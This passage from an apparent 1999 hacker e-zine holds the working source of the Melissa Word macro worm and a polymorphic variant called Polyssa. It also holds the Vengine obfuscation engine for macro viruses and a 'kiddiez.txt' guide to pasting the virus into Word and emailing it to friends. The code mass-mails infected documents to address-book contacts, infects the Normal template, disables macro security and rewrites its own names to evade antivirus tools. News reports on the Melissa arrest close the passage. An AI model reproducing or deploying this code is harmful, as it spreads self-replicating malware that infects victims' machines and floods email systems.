Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
' BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
' BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
' Pick something a little more generic:
BreakUmOffASlice.Subject = "Your mail"
BreakUmOffASlice.Body = "How's this?" + Chr$(13) + Application.UserName
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
' Do While ADI1.CodeModule.Lines(1, 1) = ""
' ADI1.CodeModule.DeleteLines 1
' Loop
' ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
' Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
' ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
' BGN = BGN + 1
' Loop
Infect ADI1.CodeModule, ToInfect.CodeModule
End If
If DoAD = True Then
' Do While NTI1.CodeModule.Lines(1, 1) = ""
' NTI1.CodeModule.DeleteLines 1
' Loop
' ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
' Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
' ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
' BGN = BGN + 1
' Loop
Infect NTI1.CodeModule, ToInfect.CodeModule
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
' Kudos to original author:
' => WORD/Melissa written by Kwyjibo
' => Works in both Word 2000 and Word 97
' => Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
' => Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
' This must go:
'If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
Private Sub InfectTable()
' This table stores the identifiers which can be scrambled. They can
' be any ordinary variable name (even names ending with a suffix like
' % or $).
ReDim QC2cz(50) ' Don't forget to set the array size!
QC2cz(1) = "Infect"
QC2cz(2) = "InfectTable"
QC2cz(3) = "Zy7td"
QC2cz(4) = "QC2cz"
QC2cz(5) = "K1j"
QC2cz(6) = "Nv4cl"
QC2cz(7) = "Co6q"
QC2cz(8) = "X3X"
QC2cz(9) = "R0e"
QC2cz(10) = "Tq4tl"
QC2cz(11) = "G4u"
QC2cz(12) = "To6dm"
QC2cz(13) = "Rg4mp"
QC2cz(14) = "I4h"
QC2cz(15) = "I6w"
QC2cz(16) = "Gy0u"
QC2cz(17) = "S5l"
QC2cz(18) = "T1g"
QC2cz(19) = "T1b"
QC2cz(20) = "Ba6Dk%" ' Note the "%" suffix
QC2cz(21) = "X1U%"
QC2cz(22) = "C6E%"
QC2cz(23) = "C6z%"
QC2cz(24) = "X6q"
QC2cz(25) = "XM2wj"
QC2cz(26) = "Yx1h"
QC2cz(27) = "Sh6k"
QC2cz(28) = "T2w"
QC2cz(29) = "Ky8c"
' Melissa entries:
QC2cz(30) = "OldMelissaCode"
QC2cz(31) = "UngaDasOutlook"
QC2cz(32) = "DasMapiName"
QC2cz(33) = "BreakUmOffASlice"
QC2cz(34) = "Melissa?"
QC2cz(35) = "Kwyjibo"
QC2cz(36) = "y"
QC2cz(37) = "x"
QC2cz(38) = "oo"
QC2cz(39) = "AddyBook"
QC2cz(40) = "Peep"
QC2cz(41) = "ADI1"
QC2cz(42) = "NTI1" ' Don't you miss the old DATA statements? :-)
QC2cz(43) = "NTCL"
QC2cz(44) = "ADCL"
QC2cz(45) = "BGN"
QC2cz(46) = "Melissa"
QC2cz(47) = "ToInfect"
QC2cz(48) = "DoAD"
QC2cz(49) = "DoNT"
QC2cz(50) = "CYA"
' EVERYTHING BELOW HERE IS THE VENGINE
End Sub
Private Sub Infect(Co6q, X3X)
ReDim Zy7td(0)
ReDim QC2cz(0)
ReDim K1j(0)
Dim R0e As String
For I = 1 To Co6q.CountOfLines
R0e = Co6q.Lines(I, 1)
If Trim(R0e) <> "" Then T2w R0e, 1
Next I
Tq4tl
X3X.DeleteLines 1, X3X.CountOfLines
X3X.AddFromString ""
For I = 1 To Co6q.CountOfLines
R0e = Co6q.Lines(I, 1)
If Trim(R0e) <> "" Then
Nv4cl = ""
T2w R0e, 2
If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b"
X3X.InsertLines X3X.CountOfLines + 1, Nv4cl
End If
Next I
End Sub
Private Sub Sh6k(To6dm As String, Rg4mp As Integer)
G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2
If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2)
I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z"
Ky8c = UCase$(Right$(To6dm, 1))
If Rg4mp = 1 Then
If I4h Then
For Ba6Dk% = 1 To UBound(Zy7td)
If To6dm = Zy7td(Ba6Dk%) Then Exit Sub
Next Ba6Dk%
ReDim Preserve Zy7td(UBound(Zy7td) + 1)
Zy7td(UBound(Zy7td)) = To6dm
End If
Exit Sub
End If
If I4h Then
For Ba6Dk% = 1 To UBound(QC2cz)
If To6dm = QC2cz(Ba6Dk%) Then
To6dm = K1j(Ba6Dk%)
If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c
Exit For
End If
Next Ba6Dk%
End If
If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34)
If Nv4cl <> "" Then
If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm
End If
Nv4cl = Nv4cl + To6dm
End Sub
Private Sub Tq4tl()
InfectTable
ReDim Preserve K1j(UBound(QC2cz))
For Ba6Dk% = 1 To UBound(K1j)
I6w:
Gy0u = Int(Rnd * 3) + 3
S5l = ""
For X1U% = 1 To Gy0u
T1g = Chr$(97 + Int(Rnd * 26))
If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g)
If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9)
S5l = S5l + T1g
Next X1U%
For X1U% = 1 To UBound(Zy7td)
If S5l = Zy7td(X1U%) Then GoTo I6w
Next X1U%
For X1U% = 1 To Ba6Dk% - 1
If S5l = K1j(X1U%) Then GoTo I6w
Next X1U%
K1j(Ba6Dk%) = S5l
Next Ba6Dk%
End Sub
Private Sub T2w(R0e As String, Rg4mp As Integer)
Dim To6dm As String
Dim T1g As String
Do
R0e = LTrim(R0e)
XM2wj = False
If Len(R0e) = 0 Then Exit Do
C6E% = 1
T1g = UCase$(Left$(R0e, 1))
X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9")
Do
If C6E% > Len(R0e) Then Exit Do
T1g = Mid$(R0e, C6E%, 1)
If T1g = Chr$(34) Then
If XM2wj Then C6E% = C6E% + 1: Exit Do
XM2wj = True
End If
If Not XM2wj Then
If X6q Then
If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do
If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do
End If
Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z"
Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_"
If X6q <> Yx1h Then Exit Do
If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do
End If
C6E% = C6E% + 1
Loop
To6dm = Left$(R0e, C6E% - 1)
R0e = Right$(R0e, Len(R0e) - (C6E% - 1))
If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do
Sh6k To6dm, Rg4mp
Loop
End Sub
-=-
Polyssa2.txt
-=-
' This file contains example 2nd generation output from Polyssa
' T1b
' T1b
' T1b
Private NM9D() As String
Private Jk4tn() As String
Private XL2o() As String
Private To6i As String
Private Sub Document_Open()
On Error Resume Next
Randomize: If Rnd > 0.6 Then Lm2jv
End Sub
Private Sub Document_Close()
On Error Resume Next
Randomize: If Rnd > 0.6 Then Lm2jv
End Sub
Private Sub Lm2jv()
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False ' T1b
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim Rm4gU, K0t, Xy9ti ' T1b
Set Rm4gU = CreateObject("Outlook.Application")
Set K0t = Rm4gU.GetNameSpace("MAPI") ' T1b
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") <> "Gp5Xr" Then
If Rm4gU = "Outlook" Then
K0t.Logon "profile", "password"
For D7R = 1 To K0t.AddressLists.Count
Set Qt3tq = K0t.AddressLists(D7R) ' T1b
Au1R = 1
Set Xy9ti = Rm4gU.CreateItem(0)
For T6e = 1 To Qt3tq.AddressEntries.Count
J2P = Qt3tq.AddressEntries(Au1R)
Xy9ti.Recipients.Add J2P
Au1R = Au1R + 1
If Au1R > 50 Then T6e = Qt3tq.AddressEntries.Count
Next T6e
Xy9ti.Subject = "Your mail"
Xy9ti.Body = "How's this?" + Chr$(13) + Application.UserName
Xy9ti.Attachments.Add ActiveDocument.FullName
Xy9ti.Send
J2P = ""
Next D7R
K0t.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") = "Gp5Xr"
End If
Set Td7x1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set RV8Q1 = NormalTemplate.VBProject.VBComponents.Item(1) ' T1b
D1d = RV8Q1.CodeModule.CountOfLines
B6r = Td7x1.CodeModule.CountOfLines
Qz3c = 2
If Td7x1.Name <> "Fg2c" Then
If B6r > 0 Then Td7x1.CodeModule.DeleteLines 1, B6r
Set Ih0M = Td7x1
Td7x1.Name = "Fg2c"
Wn2zR = True
End If
If RV8Q1.Name <> "Fg2c" Then
If D1d > 0 Then RV8Q1.CodeModule.DeleteLines 1, D1d
Set Ih0M = RV8Q1
RV8Q1.Name = "Fg2c"
Gj5y = True
End If ' T1b
If Gj5y <> True And Wn2zR <> True Then GoTo Yt9qC
If Gj5y = True Then
Wc4vu Td7x1.CodeModule, Ih0M.CodeModule
End If
If Wn2zR = True Then
' T1b
' T1b
Wc4vu RV8Q1.CodeModule, Ih0M.CodeModule
End If
Yt9qC: ' T1b
If D1d <> 0 And B6r = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ' T1b
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ' T1b
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True ' T1b
End If
' T1b
End Sub
Private Sub P5R()
' T1b
ReDim Jk4tn(50)
Jk4tn(1) = "Wc4vu"
Jk4tn(2) = "P5R"
Jk4tn(3) = "NM9D"
Jk4tn(4) = "Jk4tn"
Jk4tn(5) = "XL2o" ' T1b
Jk4tn(6) = "To6i" ' T1b
Jk4tn(7) = "ID2Ki"
Jk4tn(8) = "H2f"
Jk4tn(9) = "Q6d"
Jk4tn(10) = "E7m"
Jk4tn(11) = "Ze6Fm"
Jk4tn(12) = "Ve7Fv"
Jk4tn(13) = "C5m"
Jk4tn(14) = "Ac4G" ' T1b
Jk4tn(15) = "L1G"
Jk4tn(16) = "F6P"
Jk4tn(17) = "Qz9yi"
Jk4tn(18) = "CI1j"
Jk4tn(19) = "Qg1sh"
Jk4tn(20) = "X3J%"
Jk4tn(21) = "Vs1fb%" ' T1b
Jk4tn(22) = "S4u%"
Jk4tn(23) = "Jo5n%"
Jk4tn(24) = "I6b"
Jk4tn(25) = "Zo4ni"
Jk4tn(26) = "Vc4b"
Jk4tn(27) = "Ov1dd"
Jk4tn(28) = "L5Z" ' T1b
Jk4tn(29) = "Lq5a"
Jk4tn(30) = "Lm2jv"
Jk4tn(31) = "Rm4gU"
Jk4tn(32) = "K0t"
Jk4tn(33) = "Xy9ti"
Jk4tn(34) = "C1x?"
Jk4tn(35) = "Gp5Xr"
Jk4tn(36) = "D7R"
Jk4tn(37) = "Au1R"
Jk4tn(38) = "T6e"
Jk4tn(39) = "Qt3tq"
Jk4tn(40) = "J2P"
Jk4tn(41) = "Td7x1"
Jk4tn(42) = "RV8Q1"
Jk4tn(43) = "D1d"
Jk4tn(44) = "B6r"
Jk4tn(45) = "Qz3c"
Jk4tn(46) = "Fg2c"
Jk4tn(47) = "Ih0M" ' T1b
Jk4tn(48) = "Wn2zR"
Jk4tn(49) = "Gj5y"
Jk4tn(50) = "Yt9qC"
End Sub
Private Sub Wc4vu(ID2Ki, H2f)
ReDim NM9D(0)
ReDim Jk4tn(0)
ReDim XL2o(0)
Dim Q6d As String
For I = 1 To ID2Ki.CountOfLines
Q6d = ID2Ki.Lines(I, 1)
If Trim(Q6d) <> "" Then L5Z Q6d, 1
Next I
E7m
H2f.DeleteLines 1, H2f.CountOfLines
H2f.AddFromString ""
For I = 1 To ID2Ki.CountOfLines
Q6d = ID2Ki.Lines(I, 1)
If Trim(Q6d) <> "" Then
To6i = ""
L5Z Q6d, 2
If Rnd < 0.1 Then To6i = To6i + " ' " + "Qg1sh"
H2f.InsertLines H2f.CountOfLines + 1, To6i
End If
Next I
End Sub
Private Sub Ov1dd(Ve7Fv As String, C5m As Integer)
Ze6Fm = Left$(Ve7Fv, 1) = Chr$(34) And Right$(Ve7Fv, 1) = Chr$(34) And Len(Ve7Fv) > 2 ' T1b
If Ze6Fm Then Ve7Fv = Mid$(Ve7Fv, 2, Len(Ve7Fv) - 2)
Ac4G = UCase$(Left$(Ve7Fv, 1)) >= "A" And UCase$(Left$(Ve7Fv, 1)) <= "Z"
Lq5a = UCase$(Right$(Ve7Fv, 1))
If C5m = 1 Then
If Ac4G Then
For X3J% = 1 To UBound(NM9D)
If Ve7Fv = NM9D(X3J%) Then Exit Sub
Next X3J%
ReDim Preserve NM9D(UBound(NM9D) + 1)
NM9D(UBound(NM9D)) = Ve7Fv
End If
Exit Sub
End If
If Ac4G Then
For X3J% = 1 To UBound(Jk4tn)
If Ve7Fv = Jk4tn(X3J%) Then
Ve7Fv = XL2o(X3J%)
If Lq5a < "A" Or Lq5a > "Z" Then Ve7Fv = Ve7Fv + Lq5a
Exit For
End If ' T1b
Next X3J%
End If
If Ze6Fm Then Ve7Fv = Chr$(34) + Ve7Fv + Chr$(34)
If To6i <> "" Then
If Right$(To6i, 1) <> "." And Left$(Ve7Fv, 1) <> "." Then Ve7Fv = " " + Ve7Fv ' T1b
End If
To6i = To6i + Ve7Fv
End Sub
Private Sub E7m()
P5R
ReDim Preserve XL2o(UBound(Jk4tn))
For X3J% = 1 To UBound(XL2o)
L1G:
F6p = Int(Rnd * 3) + 3
Qz9yi = ""
For Vs1fb% = 1 To F6p
CI1j = Chr$(97 + Int(Rnd * 26))
If Vs1fb% = 1 Or Rnd > 0.8 Then CI1j = UCase$(CI1j) ' T1b
If Vs1fb% = 1 + Int(F6p / 2) Then CI1j = Chr$(48 + Rnd * 9)
Qz9yi = Qz9yi + CI1j
Next Vs1fb%
For Vs1fb% = 1 To UBound(NM9D)
If Qz9yi = NM9D(Vs1fb%) Then GoTo L1G
Next Vs1fb%
For Vs1fb% = 1 To X3J% - 1
If Qz9yi = XL2o(Vs1fb%) Then GoTo L1G
Next Vs1fb%
XL2o(X3J%) = Qz9yi
Next X3J%
End Sub
Private Sub L5Z(Q6d As String, C5m As Integer)
Dim Ve7Fv As String
Dim CI1j As String ' T1b
Do
Q6d = LTrim(Q6d)
Zo4ni = False
If Len(Q6d) = 0 Then Exit Do
S4u% = 1
CI1j = UCase$(Left$(Q6d, 1))
I6b = (CI1j >= "A" And CI1j <= "Z") Or (CI1j >= "0" And CI1j <= "9")
Do
If S4u% > Len(Q6d) Then Exit Do
CI1j = Mid$(Q6d, S4u%, 1)
If CI1j = Chr$(34) Then
If Zo4ni Then S4u% = S4u% + 1: Exit Do
Zo4ni = True ' T1b
End If
If Not Zo4ni Then
If I6b Then
If CI1j = "$" Or CI1j = "%" Or CI1j = "&" Then S4u% = S4u% + 1: Exit Do
If CI1j = "!" Or CI1j = "#" Then S4u% = S4u% + 1: Exit Do
End If
Vc4b = UCase$(CI1j) >= "A" And UCase$(CI1j) <= "Z" ' T1b
Vc4b = Vc4b Or (CI1j >= "0" And CI1j <= "9") Or CI1j = "_"
If I6b <> Vc4b Then Exit Do
If CI1j < Chr$(33) Or CI1j > Chr$(127) Then Exit Do
End If
S4u% = S4u% + 1
Loop
Ve7Fv = Left$(Q6d, S4u% - 1)
Q6d = Right$(Q6d, Len(Q6d) - (S4u% - 1))
If Left$(Ve7Fv, 1) = "'" Or Ve7Fv = "Rem" Then Exit Do
Ov1dd Ve7Fv, C5m
Loop
End Sub
-=-
Vengine.txt
-=-
' Vengine - polymorphizer for MS-Word macro viruses
' Coded by VeggieTailz
'
' This engine can be used to polymorphize any MS-Word macro virus.
'
' The Vengine concept was inspired by Nick FitzGerald's asinine posting
' on BugTraq, dated 3/29/99 and archived at geek-girl.com.
'
Private Zy7td() As String
Private QC2cz() As String
Private K1j() As String
Private Nv4cl As String
Private Sub Example()
' As a demo, we'll copy the current macros to the template. After running
' this example (make sure this is the ActiveDocument!), examine the MS-Word
' template. It will contain a scrambled (but still functional) version of
' this program.
Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set Dest = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
' The "Infect" sub copies the macros from "Source" to "Dest", scrambling
' them in the process. The contents of Dest are overwritten.
Infect Source, Dest
End Sub
Private Sub InfectTable()
' This table stores the identifiers which will be scrambled. They can
' be any ordinary variable name (even names ending with a suffix like
' % or $). Make your choices carefully tho, as the substitutions
' will also be applied to string constants (otherwise the code below
' would not get updated).
ReDim QC2cz(29) ' don't forget to set the array size!
QC2cz(1) = "Infect"
QC2cz(2) = "InfectTable"
QC2cz(3) = "Zy7td"
QC2cz(4) = "QC2cz"
QC2cz(5) = "K1j"
QC2cz(6) = "Nv4cl"
QC2cz(7) = "Co6q"
QC2cz(8) = "X3X"
QC2cz(9) = "R0e"
QC2cz(10) = "Tq4tl"
QC2cz(11) = "G4u"
QC2cz(12) = "To6dm"
QC2cz(13) = "Rg4mp"
QC2cz(14) = "I4h"
QC2cz(15) = "I6w"
QC2cz(16) = "Gy0u"
QC2cz(17) = "S5l"
QC2cz(18) = "T1g"
QC2cz(19) = "T1b"
QC2cz(20) = "Ba6Dk%"
QC2cz(21) = "X1U%"
QC2cz(22) = "C6E%"
QC2cz(23) = "C6z%"
QC2cz(24) = "X6q"
QC2cz(25) = "XM2wj"
QC2cz(26) = "Yx1h"
QC2cz(27) = "Sh6k"
QC2cz(28) = "T2w"
QC2cz(29) = "Ky8c"
' [add your entries here!]
End Sub
Private Sub Infect(Co6q, X3X)
ReDim Zy7td(0)
ReDim QC2cz(0)
ReDim K1j(0)
Dim R0e As String
For I = 1 To Co6q.CountOfLines
R0e = Co6q.Lines(I, 1)
If Trim(R0e) <> "" Then T2w R0e, 1
Next I
Tq4tl
X3X.DeleteLines 1, X3X.CountOfLines
X3X.AddFromString ""
For I = 1 To Co6q.CountOfLines
R0e = Co6q.Lines(I, 1)
If Trim(R0e) <> "" Then
Nv4cl = ""
T2w R0e, 2
If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b"
X3X.InsertLines X3X.CountOfLines + 1, Nv4cl
End If
Next I
End Sub
Private Sub Sh6k(To6dm As String, Rg4mp As Integer)
G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2
If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2)
I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z"
Ky8c = UCase$(Right$(To6dm, 1))
If Rg4mp = 1 Then
If I4h Then
For Ba6Dk% = 1 To UBound(Zy7td)
If To6dm = Zy7td(Ba6Dk%) Then Exit Sub
Next Ba6Dk%
ReDim Preserve Zy7td(UBound(Zy7td) + 1)
Zy7td(UBound(Zy7td)) = To6dm
End If
Exit Sub
End If
If I4h Then
For Ba6Dk% = 1 To UBound(QC2cz)
If To6dm = QC2cz(Ba6Dk%) Then
To6dm = K1j(Ba6Dk%)
If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c
Exit For
End If
Next Ba6Dk%
End If
If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34)
If Nv4cl <> "" Then
If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm
End If
Nv4cl = Nv4cl + To6dm
End Sub
Private Sub Tq4tl()
InfectTable
ReDim Preserve K1j(UBound(QC2cz))
For Ba6Dk% = 1 To UBound(K1j)
I6w:
Gy0u = Int(Rnd * 3) + 3
S5l = ""
For X1U% = 1 To Gy0u
T1g = Chr$(97 + Int(Rnd * 26))
If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g)
If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9)
S5l = S5l + T1g
Next X1U%
For X1U% = 1 To UBound(Zy7td)
If S5l = Zy7td(X1U%) Then GoTo I6w
Next X1U%
For X1U% = 1 To Ba6Dk% - 1
If S5l = K1j(X1U%) Then GoTo I6w
Next X1U%
K1j(Ba6Dk%) = S5l
Next Ba6Dk%
End Sub
Private Sub T2w(R0e As String, Rg4mp As Integer)
Dim To6dm As String
Dim T1g As String
Do
R0e = LTrim(R0e)
XM2wj = False
If Len(R0e) = 0 Then Exit Do
C6E% = 1
T1g = UCase$(Left$(R0e, 1))
X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9")
Do
If C6E% > Len(R0e) Then Exit Do
T1g = Mid$(R0e, C6E%, 1)
If T1g = Chr$(34) Then
If XM2wj Then C6E% = C6E% + 1: Exit Do
XM2wj = True
End If
If Not XM2wj Then
If X6q Then
If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do
If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do
End If
Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z"
Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_"
If X6q <> Yx1h Then Exit Do
If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do
End If
C6E% = C6E% + 1
Loop
To6dm = Left$(R0e, C6E% - 1)
R0e = Right$(R0e, Len(R0e) - (C6E% - 1))
If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do
Sh6k To6dm, Rg4mp
Loop
End Sub
-0-
kiddiez.txt
-0-
Okay, so you can't program even BASIC, and you just want a copy of
the virus to play with. Here's how:
1. Open up Microsoft Word
2. Press ALT-F11, which will pop up the VBA editor
3. In the "Project" window, you'll see "Project (Document1)".
4. Find "Microsoft Word Objects", then "ThisDocument" under that.
5. Double-click on "ThisDocument". Delete any text that shows up
in the editor (on the right-hand side).
6. Open Polyssa2.txt with Notepad. From the "Edit" menu, chose
"Select All", followed by "Copy".
7. Go back to your "Microsoft Visual Basic" window, and click
on the right-hand window again (below where it says "(General)" or
something at the top). Then click "Paste".
8. Press ALT-Q to return to Microsoft Word. Save your new document.
9. E-mail it to all your "friends".
10. Pat yourself on the back; you have successfully followed directions
at least once in your miserable little life.
-VeggieTailz
N.B; The original melissa code was included in last issue and won't be
reprinted here, - Ed
@HWA
18.1 [ISN] Virus camp split over melissa virus bust
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 4 Apr 1999 06:18:33 -0600 (MDT)
From: mea culpa <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: [ISN] Virus writers' community split by arrest
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
NEW YORK (AP) [4.2.99] - The close-knit underground of computer virus
creators split into two camps at the news that one of their own may have
been arrested for releasing malicious Melissa.
``The whole community has really been shaken up by this,'' said B.K.
Delong, who follows the virus scene. ``The first group is one that wants a
better reputation. Then there's the community that wants to retaliate and
come up with even more destructive viruses.''
Virus creators gather at the Virus Exchange Underground, a computer chat
area where they swap ideas and gossip. Most are programmers interested in
viruses and computer bugs. They often write viruses and swap them among
themselves, Delong said.
They refer to themselves as ``Black Hats,'' interested in doing damage,
and ``White Hats.'' The Black Hats sometimes release viruses through
e-mail or Usenet newsgroups.
In a statement released on behalf of the VX Underground, as it's often
called, the group warned the media and investigators not to quickly
condemn the author of Melissa.
``Instead they should be more interested in the person who released the
bug which caused the spread of the virus,'' said the statement, which was
e-mailed to The Associated Press.
Melissa was originally posted on two sex discussion groups a week ago
Friday, according to an online search. The VX Underground said it was
highly unlikely those two posts out of thousands could have led to
Melissa's vicious cascade.
``However, once released others posted the Melissa source code to
additional newsgroups, Web sites and listservs (mailing lists), which
meant anyone could turn it into the virus and continue to spread it,'' the
statement continued.
David L. Smith, 30, of Aberdeen, N.J., was arrested Friday and charged
with originating the destructive Melissa, which infected hundreds of
thousands of computers and swamped hundreds of companies' e-mail systems.
Computer experts used unique identification numbers embedded in Microsoft
Word documents to trace Melissa back to a well-known virus writer who
calls himself VicodinES.
Rita Malley, spokeswoman for the New Jersey state attorney general's
office said Smith was ``definitely not'' the person known by that handle.
Instead, Smith took two viruses, one of which came from VicodinES, and
combined them with another virus to create Melissa, she said.
``They (the Black Hat programmers) are looking for someone to blame,''
said Delong. They resent the treatment VicodinES supposedly received at
the hands of the media, and they're rallying around their own. They said
he is a really nice guy.''
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
18.2 [ISN] The Anarchic Lure of Virus Writing ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NYTIMES;
http://www.nytimes.com/library/tech/99/04/biztech/articles/03virus.html
<a href="http://www.nytimes.com/library/tech/99/04/biztech/articles/03virus.html">Link</a>
April 3, 1999
The Anarchic Lure of Virus Writing
By MATT RICHTEL and JOHN MARKOFF
In the world of cyberspace, the sport of virus writing has become the
latter-day equivalent of the urge to write "Kilroy was here" on the wall
of the school auditorium. And it is a hobby with a growing following.
The emergence of the Melissa virus a week ago, and the announcement
yesterday of an arrest in the case, underscores the growth on the Internet
of a community of virus writers and collectors. They freely trade
malicious code, combine efforts to best the work of antivirus researchers,
and post their creations on the Internet for anyone to download and
release into the wild.
"It's like candy," said Sarah Gordon, an antivirus researcher for I.B.M.
who spent five years researching the virus-writing subculture. "A child
can get these, a 12-year-old can get these." She said it required little
technical expertise to introduce a virus once it was obtained.
"It's trivial," she said. "All you do is download it to a computer, click
on it and there you go."
As the computer has become ubiquitous, the image of the bad guy of the
technology era, the bespectacled introvert who attacks computer networks
by keystroke, has emerged. Within this category, there exists a subset of
virus writers, a subculture within the subculture.
The International Computer Security Association, an industry corporation
based in Carlisle, Pa., estimated last year that there were 15,000 to
20,000 viruses in circulation, with 1,000 emerging each month. Only a
small number are widely circulated, or "make it into the wild," in the
industry vernacular.
But their proliferation has given rise to a highly competitive industry of
companies that seek out the latest strains and find and market software
antidotes.
Over the years, virus writing has been perceived as having less status in
the hacker set than cracking into government and corporate computers. But
virus writing appears to have become more attractive to hackers as
publicity around viruses has grown, say computer buffs and executives at
antivirus companies.
One early group of virus writers, 40Hex, which published a magazine,
emerged in the early 1990's, said Jeff Moss, the founder of Defcon, an
annual gathering of the computer underground. "They were going to cause
the downfall of civilization, but then they got bored after a while,"
Moss said.
"There wasn't that much happening in virus writing," he added, "so the
more motivated people went off to normal hacking." As opposed to hacking,
which can demand a range of skill levels, virus writing traditionally
attracted a more technically oriented set. Virus writers "are very much
into super-down-and-dirty programming," Moss said.
But in recent years, virus writing has experienced a resurgence, generally
attracting a less technically adept group. Increasingly, simple templates
are available for use in virus writing and breaking into computers, making
the endeavor open to copycats and less adept programmers.
In the underground, these copycats are known as script kiddies. In the
